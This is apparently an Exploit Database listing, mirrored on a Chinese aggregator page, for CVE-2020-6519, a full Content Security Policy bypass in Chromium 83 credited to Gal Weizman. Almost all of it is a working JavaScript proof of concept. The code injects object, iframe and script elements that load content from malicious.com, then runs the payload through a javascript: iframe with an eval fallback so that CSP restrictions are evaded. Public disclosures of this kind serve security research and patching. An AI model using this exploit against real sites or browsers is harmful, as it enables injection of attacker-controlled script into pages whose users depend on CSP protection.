Chromium 83 – Full CSP Bypass

• Exploit Database
• 126 阅读

• 作者： Gal Weizman
  日期： 2020-12-04
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49195/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  #Title: Chromium 83 - Full CSP Bypass #Date: 02/09/2020 #Exploit Author: Gal Weizman #Vendor Homepage: https://www.chromium.org/ #Software Link: https://download-chromium.appspot.com/ #Version: 83 #Tested On: Mac OS, Windows, iPhone, Android #CVE: CVE-2020-6519   (function(){   var payload = <code> top.SUCCESS = true; var o = document.createElement("object"); o.data = </code>http://malicious.com/bypass-object-src.html<code>; document.body.appendChild(o); var i = document.createElement("iframe"); i.src = </code>http://malicious.com/bypass-child-src.html<code>; document.body.appendChild(i); var s = document.createElement("script"); s.src = </code>http://malicious.com/bypass-script-src.js<code>; document.body.appendChild(s); </code>;   document.body.innerHTML+="<iframe id=&apos;XXX&apos; src=&apos;javascript:" + payload +"&apos;></iframe>"; setTimeout(() => { if (!top.SUCCESS) { XXX.contentWindow.eval(payload); } });   }())   // further information: https://github.com/weizman/CVE-2020-6519